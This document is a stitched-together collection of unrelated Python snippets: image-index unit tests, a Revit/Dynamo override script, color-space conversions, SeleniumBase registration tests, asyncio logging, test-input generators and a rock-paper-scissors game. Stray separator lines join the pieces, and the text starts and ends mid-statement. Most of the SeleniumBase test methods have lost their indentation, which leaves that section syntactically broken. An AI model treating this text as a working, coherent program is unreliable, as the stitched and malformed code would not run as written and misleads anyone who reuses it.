    list_filter=('category','people',)
admin.site.register(Meals,MealsAdmin)
admin.site.register(Category)
import base64
import sys
import os, io
import json
import time
import aiounittest
import asyncio
import unittest
import aiohttp
import numpy as np
from match_image.do_handler import MatchImageIndexDelete
from match_image.search_labels import SearchImageLabels
from match_image import create_index
from match_image import utils
from PIL import Image
from unittest import mock
def SetAddLabel(label_type=None):
    """Return a label string used when creating the image index.

    label_type 1 -> ASCII punctuation/whitespace label,
    label_type 2 -> full-width (CJK) punctuation label,
    anything else -> plain default label.
    """
    special_labels = {
        1: "C'`~!@#$%^&*( )-_=+,<.>/?\|\t\n",
        2: "C·~!@#¥%……&*()-=——+【{}】:“;‘’”,。、《 》?",
    }
    return special_labels.get(label_type, "CTest://image/label.jpg")
def SetAddImage():
    # ===============================================================
    # Load and normalize the fixture image used for index creation.
    image_path = sys.path[0] + "/image001.jpg"
    img = Image.open(image_path)
    img = img.convert('RGB')
    # NOTE(review): utils.Normal's second argument (3) is presumably a
    # resize/normalization mode -- confirm in match_image.utils.
    img = utils.Normal(img, 3)
    img_rgb_array = np.array(img)[:, :, :3]
    return img_rgb_array
async def CheckAddImageLabelResult(image, label):
    # ===============================================================
    # Verify index creation end-to-end: (1) the label is absent before the
    # add, (2) the add call succeeds, (3) the label becomes searchable
    # within ~30 polls (indexing is asynchronous).
    try:
        result_1 = await SearchImageLabels(image)
        ifconfi_1 = label not in result_1
        result_2 = await create_index.AddImageLabel(image, label)
        ifconfi_2 = result_2
        for i in range(30):
            result_3 = await SearchImageLabels(image)
            if label in result_3:
                ifconfi_3 = True
                break
            else:
                ifconfi_3 = False
                time.sleep(1)
        if ifconfi_1 and ifconfi_2 and ifconfi_3:
            return True
        else:
            return False
    except BaseException as err:
        # NOTE(review): BaseException also swallows KeyboardInterrupt and
        # CancelledError; any failure is reported as False.
        return False
async def CatchESConnectError(image, label):
    # ===============================================================
    # Expect AddImageLabel to fail with an ElasticSearch connection error;
    # True only when the raised error carries code 500 and that cause.
    try:
        result = await create_index.AddImageLabel(image, label)
        return False
    except BaseException as err:
        ifcondi_1 = bool(err.code[:3] == "500")
        ifcondi_2 = bool(err.cause == "Failed to connect to ElasticSearch.")
        if ifcondi_1 and ifcondi_2:
            return True
        else:
            return False
async def CatchDLConnectError(image, label):
    # ===============================================================
    # Expect AddImageLabel to fail with a DL-Inference-Serving connection
    # error; True only when code is 500 and the cause matches.
    try:
        result = await create_index.AddImageLabel(image, label)
        return False
    except BaseException as err:
        ifcondi_1 = bool(err.code[:3] == "500")
        ifcondi_2 = bool(err.cause == "Failed to connect to DL-Inference-Serving.")
        if ifcondi_1 and ifcondi_2:
            return True
        else:
            return False
async def CatchESInitError(image, label):
    # ===============================================================
    # Expect AddImageLabel to fail because the ES service is reachable but
    # not initialized; True only when code is 500 and the cause matches.
    try:
        result = await create_index.AddImageLabel(image, label)
        return False
    except BaseException as err:
        ifcondi_1 = bool(err.code[:3] == "500")
        ifcondi_2 = bool(err.cause == "Service is not initialized.")
        if ifcondi_1 and ifcondi_2:
            return True
        else:
            return False
class TestSearch(aiounittest.AsyncTestCase):
    """Async unit tests for create_index.AddImageLabel."""
    def get_event_loop(self):
        # aiounittest hook: reuse the default loop for async test methods.
        self.loop = asyncio.get_event_loop()
        return self.loop
    @classmethod
    def setUpClass(cls):
        # ===============================================================
        # UT start: wipe the data environment (delete any leftover labels).
        try:
            cls.loop = asyncio.get_event_loop()
            params = dict(
                labels=[SetAddLabel(i) for i in range(3)],
            )
            cls.loop.run_until_complete(MatchImageIndexDelete(params))
            time.sleep(10)
        except BaseException as err:
            print(err)
            raise(err)
    @classmethod
    def tearDownClass(cls):
        # ===============================================================
        # UT finished: delete the test data.
        try:
            cls.loop = asyncio.get_event_loop()
            params = dict(
                labels=[SetAddLabel(i) for i in range(3)],
            )
            cls.loop.run_until_complete(MatchImageIndexDelete(params))
            time.sleep(3)
        except BaseException as err:
            print(err)
            raise(err)
    async def test_AddImageLabel_1(self):
        # ===============================================================
        # Create an index for an image for the first time.
        image = SetAddImage()
        label = SetAddLabel(1)
        result = await CheckAddImageLabelResult(image, label)
        self.assertTrue(result)
        # ===============================================================
        # Append another label to the same image (index update).
        image = SetAddImage()
        label = SetAddLabel(2)
        result = await CheckAddImageLabelResult(image, label)
        self.assertTrue(result)
    async def test_AddImageLabel_2(self):
        # ===============================================================
        # ES connection error while creating the image-label index
        # (ES endpoint patched to an unreachable address).
        image = SetAddImage()
        label = SetAddLabel()
        elasticsearch_path = mock.Mock(return_value="http://127.0.0.1:8080")
        with mock.patch('match_image.create_index.ELASTICSEARCH_PATH', elasticsearch_path):
            result = await CatchESConnectError(image, label)
        self.assertTrue(result)
    async def test_AddImageLabel_3(self):
        # ===============================================================
        # DL-serving connection error while creating the index.
        image = SetAddImage()
        label = SetAddLabel()
        dl_inference_server_excep = mock.Mock(return_value=Exception)
        with mock.patch('match_image.create_index.GetVisualLabels', dl_inference_server_excep):
            ahash_result = mock.Mock(return_value="error_hash_code")
            with mock.patch('match_image.create_index.AverageHash', ahash_result):
                result = await CatchDLConnectError(image, label)
        self.assertTrue(result)
    async def test_AddImageLabel_4(self):
        # ===============================================================
        # ES reachable but the service is not initialized (bad aliases).
        image = SetAddImage()
        label = SetAddLabel()
        aliases = mock.Mock(return_value="error_aliases")
        with mock.patch('match_image.create_index.ALIASES', aliases):
            result = await CatchESInitError(image, label)
        self.assertTrue(result)
if __name__ == "__main__":
    unittest.main()
# IronPython (Dynamo/Revit) bootstrap: load the .NET assemblies needed for
# geometry, Revit node wrapping, document/transaction access, and the raw
# Revit API.
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
#Override graphics
def OverrideElement(element, color, fill, fillpatt):
	# Builds an OverrideGraphicSettings (projection line pattern, fill color
	# and fill pattern) and applies it to `element` in the active view.
	# Uses the module-level `doc`, bound below before this is ever called.
	ogs = OverrideGraphicSettings()
	ogs.SetProjectionLinePatternId(fill.Id)
	ogs.SetProjectionFillColor(color)
	ogs.SetProjectionFillPatternId(fillpatt.Id)
	doc.ActiveView.SetElementOverrides(element.Id, ogs)
#Convert the Dynamo color to Revit color.
def ConvertColor(element):
	"""Map a list of Dynamo colors to Revit API Color objects."""
	return [Autodesk.Revit.DB.Color(e.Red, e.Green, e.Blue) for e in element]
doc = DocumentManager.Instance.CurrentDBDocument
#Collect all the line patterns in the project.
patterns = FilteredElementCollector(doc).OfClass(LinePatternElement).ToElements()
fillPatSelected = list()
#search for line pattern
# Find the "Dash" line pattern; it is used as the projection line pattern
# for every overridden element below.
for i in range(len(patterns)):
	namepick = patterns[i].ToDSType(True)
	if namepick.Name == "Dash":
		fillPatSelected.append(patterns[i])
elements = UnwrapElement(IN[0]) #Element to change
colors = ConvertColor(IN[1]) #Color.ByARGB node from Dynamo
fillPat = UnwrapElement(IN[2]) #Fill Pattern node from Dynamo
count = 0 #count to change color if elements are different colors.
# NOTE(review): assumes IN[1] supplies at least one color per element;
# otherwise colors[count] raises IndexError.
for i in elements:
	TransactionManager.Instance.EnsureInTransaction(doc)
	#Using def to override graphics.
	OverrideElement(i, colors[count], fillPatSelected[0], fillPat)
	count += 1
TransactionManager.Instance.TransactionTaskDone()
|
import sys
# Print the command-line arguments.
print(sys.argv)
print("ㅡㅡㅡ")
# Print information about the computer environment.
# NOTE(review): sys.getwindowsversion() exists only on Windows.
print("get windows version :()", sys.getwindowsversion())
print("ㅡㅡㅡ")
print("copyright :", sys.copyright)
print("ㅡㅡㅡ")
print("version :", sys.version)
# Force the program to terminate.
sys.exit()
import numpy as np
import cv2, os, math
class ColorSystem:
    """Pixel-by-pixel color-space conversions on 3-channel uint8 images.

    All methods assume channel order [R, G, B] in index 0..2 -- note that
    cv2.imread yields BGR, so confirm the caller's channel order.
    """

    @staticmethod
    def grayscale(img):
        """Average-method grayscale: every channel becomes mean(R, G, B).

        Bug fix: the channel values are numpy uint8, so summing them
        directly wrapped around at 256 and produced wrong gray levels;
        they are now widened to Python ints before summing.
        """
        newImage = np.zeros((img.shape[0], img.shape[1], img.shape[2]), np.uint8)
        rows, columns, pixel = img.shape
        for i in range(rows):
            for j in range(columns):
                red = int(img[i][j][0])
                green = int(img[i][j][1])
                blue = int(img[i][j][2])
                newPixel = round((red + green + blue) / 3)
                # Broadcast the gray level to all channels of the pixel.
                newImage[i][j] = newPixel
        return newImage

    @staticmethod
    def cmy(img):
        """RGB -> CMY: each channel is simply inverted (255 - value)."""
        newImage = np.zeros((img.shape[0], img.shape[1], img.shape[2]), np.uint8)
        rows, columns, pixel = img.shape
        for i in range(rows):
            for j in range(columns):
                # 255 - uint8 cannot overflow, so no widening is needed here.
                newImage[i][j][0] = 255 - img[i][j][0]
                newImage[i][j][1] = 255 - img[i][j][1]
                newImage[i][j][2] = 255 - img[i][j][2]
        return newImage

    @staticmethod
    def YCrCb(img):
        """RGB -> YCrCb (BT.601, same formula as OpenCV's RGB2YCrCb).

        Bug fix: the luma weights were mistyped as 0.229/0.144; the
        standard coefficients are Y = 0.299 R + 0.587 G + 0.114 B (they
        must sum to 1.0, otherwise a gray pixel changes brightness). The
        chroma factors 0.713/0.564 and delta=128 for 8-bit data were
        already correct.
        """
        newImage = np.zeros((img.shape[0], img.shape[1], img.shape[2]), np.uint8)
        rows, columns, pixel = img.shape
        delta = 128  # 8-bit chroma offset
        for i in range(rows):
            for j in range(columns):
                R = int(img[i][j][0])
                G = int(img[i][j][1])
                B = int(img[i][j][2])
                Y = 0.299 * R + 0.587 * G + 0.114 * B
                Cr = (R - Y) * 0.713 + delta
                Cb = (B - Y) * 0.564 + delta
                newImage[i][j][0] = Y
                newImage[i][j][1] = Cr
                newImage[i][j][2] = Cb
        return newImage
|
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User
from werkzeug.security import generate_password_hash, check_password_hash
# Mock a sample user
test_user = User(
    email='test_frontend@test.com',
    name='test_frontend',
    password=generate_password_hash('Password!'),
    balance=0
)
# Sample user with an unhashed password
# (the plaintext twin exists because the tests type this value into the
# login form, while the mocked backend stores only the hash).
test_user_unhashed = User(
    email='test_frontend@test.com',
    name='test_frontend',
    password='Password!',
)
# Mock a newly registered sample user
test_valid = User(
    email='valid.email@address.com',
    name='Valid Username',
    password=generate_password_hash('ValidP@ssword'),
    balance=5000
)
# Newly registered sample user with an unhashed password
test_valid_unhashed = User(
    email='valid.email@address.com',
    name='Valid Username',
    password='ValidP@ssword',
)
class RegisterTest(BaseCase):
    # backend.get_user is mocked so the login succeeds without a database.
    @patch('qa327.backend.get_user', return_value=test_user)
    def test_R2_1(self, *_):
        """
        If the user has logged in, redirect back to the user profile page
        """
        # Navigate to /logout (Invalidate any logged-in sessions)
        self.open(base_url + '/logout')
        # Navigate to /login
        self.open(base_url + '/login')
        # Enter `test_user_unhashed.email` in `#email` element
        self.type("#email", test_user_unhashed.email)
        # Enter `test_user_unhashed.password` in `#password` element
        self.type("#password", test_user_unhashed.password)
        # Click on `#btn-submit` element
        self.click('input[type="submit"]')
        # Navigate to /register
        self.open(base_url + '/register')
        # Verify that profile page is visible by checking for `#welcome-header` element in DOM
        self.assert_element("#welcome-header")
        self.assert_text("Hi test_frontend", "#welcome-header")
def test_R2_2(self, *_):
"""
Otherwise, show the user registration page
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Verify that register page is visible by checking for expected elements (eg. `form-group`) in DOM
self.assert_title("Register")
def test_R2_3(self, *_):
"""
The registration page shows a registration form requesting:
email, user name, password, password2
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Verify that `#email`, `#name`, `#password`, and `#password2` elements exist in the DOM
self.assert_element("#email")
self.assert_element("#name")
self.assert_element("#password")
self.assert_element("#password2")
@patch('qa327.backend.register_user', return_value=None)
def test_R2_4(self, *_):
"""
The registration form can be submitted as a POST request to the current URL (/register)
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify that login page is visible by checking expected elements (eg. `form-group`) in DOM
self.assert_title("Log In")
def test_R2_5a(self, *_):
"""
Email cannot be empty
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5b(self, *_):
"""
Password cannot be empty
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5c(self, *_):
"""
Password2 cannot be empty
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("The passwords do not match", "#message")
def test_R2_5d(self, *_):
"""
Email has to follow addr-spec defined in RFC 5322
(see https://en.wikipedia.org/wiki/Email_address for a human-friendly explanation)
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter “not.@.valid@email_address.com” in `#email` element
self.type("#email", "not.@.valid@email_address.com")
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5e(self, *_):
"""
Password has to meet the required complexity: minimum length 6
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter “$Mall” in `#password` element
self.type("#password", "$Mall")
# Enter “$Mall” in `#password2` element
self.type("#password2", "$Mall")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5f(self, *_):
"""
Password has to meet the required complexity: at least one upper case
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter “lowerc@se” in `#password` element
self.type("#password", "lowerc@se")
# Enter “lowerc@se” in `#password2` element
self.type("#password2", "lowerc@se")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5g(self, *_):
"""
Password has to meet the required complexity: least one lower case
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter “UPPERC@SE” in `#password` element
self.type("#password", "UPPERC@SE")
# Enter “UPPERC@SE” in `#password2` element
self.type("#password2", "UPPERC@SE")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5h(self, *_):
"""
Password has to meet the required complexity: at least one special character
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter “noSpecial” in `#password` element
self.type("#password", "noSpecial")
# Enter “noSpecial” in `#password2` element
self.type("#password2", "noSpecial")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_6(self, *_):
"""
Password and password2 have to be exactly the same
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a different valid password (e.g. “AlsoValidP@ssword”) in `#password2` element
self.type("#password2", "AlsoValidP@ssword")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("The passwords do not match", "#message")
def test_R2_7a(self, *_):
"""
Username has to be non-empty.
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Username format error", "#message")
def test_R2_7b(self, *_):
"""
Username has to be alphanumeric-only.
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter “#alphanumer” in `#name` element
self.type("#name", "#alphanumer")
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Username format error", "#message")
def test_R2_8a(self, *_):
"""
Username has to be longer than 2 characters.
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter “2C” in `#name` element
self.type("#name", "2C")
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Username format error", "#message")
def test_R2_8b(self, *_):
"""
Username has to be less than 20 characters.
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter “twentycharacterslong” `#name` element
self.type("#name", "twentycharacterslong")
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Username format error", "#message")
@patch('qa327.backend.register_user', return_value="This email has been ALREADY used")
def test_R2_10(self, *_):
"""
If the email already exists, show message 'This email has been ALREADY used'
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("This email has been ALREADY used", "#message")
@patch('qa327.backend.get_user', return_value=test_valid)
@patch('qa327.backend.register_user', return_value=None)
def test_R2_11(self, *_):
"""
If no error regarding the inputs following the rules above,
create a new user, set the balance to 5000, and go back to the /login page
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Enter the same valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter the same valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays balance at 5000 by checking content of `#balance_message`
self.assert_element("#balance")
self.assert_text("User Balance: $5000", "#balance") |
import logging
import asyncio
# Log to test3_log.txt, truncating it on every run; level 20 == logging.INFO.
logging.basicConfig(filename = "test3_log.txt", filemode = 'w', format='%(asctime)s: %(message)s', datefmt='%d-%b-%y %H:%M:%S', level=20)
async def nested(value):
    """Sleep for *value* seconds, then record one INFO entry in the log."""
    delay_seconds = value
    await asyncio.sleep(delay_seconds)
    logging.info("Logging Message.")
async def main():
    """Launch four `nested` tasks concurrently and wait for all of them.

    Uses `asyncio.gather` instead of the manual create-then-await loop;
    the tasks still start immediately and run concurrently, so the total
    runtime is bounded by the longest sleep (3 s).
    """
    tasks = [asyncio.create_task(nested(i)) for i in range(4)]
    await asyncio.gather(*tasks)
# Entry point: drive the event loop until all logging tasks finish.
asyncio.run(main())
#!/usr/bin/python
"""Generate three input files of integer sequences of growing length:
fully random (ejRandom.in), strictly monotone "worst case"
(ejPeorCaso.in), and alternating-sign "best case" (ejMejorCaso.in).

Fixes over the original: Python-2-only ``xrange`` replaced with ``range``,
the builtin name ``file`` is no longer shadowed, files are closed
deterministically via ``with``, and generation is parameterized and
guarded by ``__main__`` so the helpers are importable and testable.
"""
import random


def write_random_file(path, limit=10000, step=100):
    """Write one line of `size` uniform integers in [-size, size) for each
    size = 1, 1+step, ... < limit."""
    with open(path, 'w') as out:
        for size in range(1, limit, step):
            values = [random.randrange(-size, size) for _ in range(size)]
            # Original format: every number followed by a space, then newline.
            out.write(' '.join(str(v) for v in values) + ' \n')


def write_monotone_file(path, limit=10000, step=100):
    """Write strictly monotone lines: each line is randomly either an
    increasing run from a negative start or a decreasing run from a
    positive start, with random step sizes in [1, size]."""
    with open(path, 'w') as out:
        for size in range(1, limit, step):
            if random.randrange(0, 2) == 0:
                num = random.randrange(-size, 0)
                for _ in range(size):
                    num += random.randrange(size) + 1
                    out.write(str(num) + ' ')
            else:
                num = random.randrange(0, size)
                for _ in range(size):
                    num -= random.randrange(size) + 1
                    out.write(str(num) + ' ')
            out.write('\n')


def write_alternating_file(path, limit=10000, step=100):
    """Write zig-zag lines alternating between a rising positive running
    total and a falling negative running total (the original 'best case')."""
    with open(path, 'w') as out:
        for size in range(1, limit, step):
            rising = 0    # running total of the positive track
            falling = 0   # running total of the negative track
            use_rising = True
            for _ in range(size):
                if use_rising:
                    rising += random.randrange(size) + 1
                    num = rising
                else:
                    falling -= random.randrange(size) + 1
                    num = falling
                use_rising = not use_rising
                out.write(str(num) + ' ')
            out.write('\n')


if __name__ == '__main__':
    # Same three output files the original script produced.
    write_random_file('ejRandom.in')
    write_monotone_file('ejPeorCaso.in')
    write_alternating_file('ejMejorCaso.in')
import random
import csv
def get_table_from_file(file_name):
    """Read *file_name* and return its rows as a list of lists, each line
    split on the '!' separator (trailing newlines removed)."""
    with open(file_name, "r") as source:
        raw_lines = source.readlines()
    return [row.replace("\n", "").split("!") for row in raw_lines]
def csv_reader(file_name):
    """Return one uniformly random cell drawn from a CSV file.

    Fixes over the original: the file handle is closed deterministically
    (the original leaked it), and the quadratic ``sum(rows, [])`` flatten
    is replaced with a flat comprehension.
    """
    with open(file_name, 'r') as handle:
        data = [cell for row in csv.reader(handle) for cell in row]
    return random.choice(data)
|
'''
Write a Python function to check whether a number is in a given range.
'''
def check_range(num):
    """Print whether *num* (an int or numeric string) lies in 0..10 inclusive."""
    inside = 0 <= int(num) <= 10
    if inside:
        print("%s is in range from 0 to 10" % num)
    else:
        print("%s is outside of the range from 0 to 10" % num)
# Prompt the user and report on their number; input() returns a str,
# which check_range converts with int() (non-numeric input raises ValueError).
check_range(input("Enter the number: "))
import random
# Rock-paper-scissors game (UI strings are Korean).
print('가위바위보 게임입니다')
# Hand names: scissors, rock, paper.
# NOTE(review): this list is never read afterwards — the game works on the
# integer codes 1..3 instead; kept for reference.
l = ['가위','바위','보']
def gawi():
    """Print ASCII art of the scissors hand."""
    print(' * *')
    print(' * *')
    print(' * *')
    print(' * *')
    print(' ***')
    print(' ******')
    print(' ********')
    print(' *****')
    print(' ***')
def bawi():
    """Print ASCII art of the rock hand (blank rows keep it aligned with the others)."""
    print('')
    print('')
    print('')
    print('')
    print(' ***')
    print(' ******')
    print(' ********')
    print(' *****')
    print(' ***')
def bo():
    """Print ASCII art of the paper hand."""
    print(' * * ')
    print(' * * *')
    print(' * * * *')
    print(' * * * *')
    print('* * * * *')
    print('** ******')
    print(' ********')
    print(' *****')
    print(' ***')
def display(x):
    """Draw the hand for choice *x*: 1 = scissors, 2 = rock, 3 = paper.

    Any other value draws nothing, matching the original if-chain.
    """
    hands = {1: gawi, 2: bawi, 3: bo}
    if x in hands:
        hands[x]()
# Main game loop: 0 quits, 1..3 play one round against a random computer hand.
while True:
    a = random.randint(1, 3)  # computer's hand
    print('')
    print('1=가위 2=바위 3=보')
    print('무엇을 내실건가요?')
    c = input('')
    try:
        d = int(c)
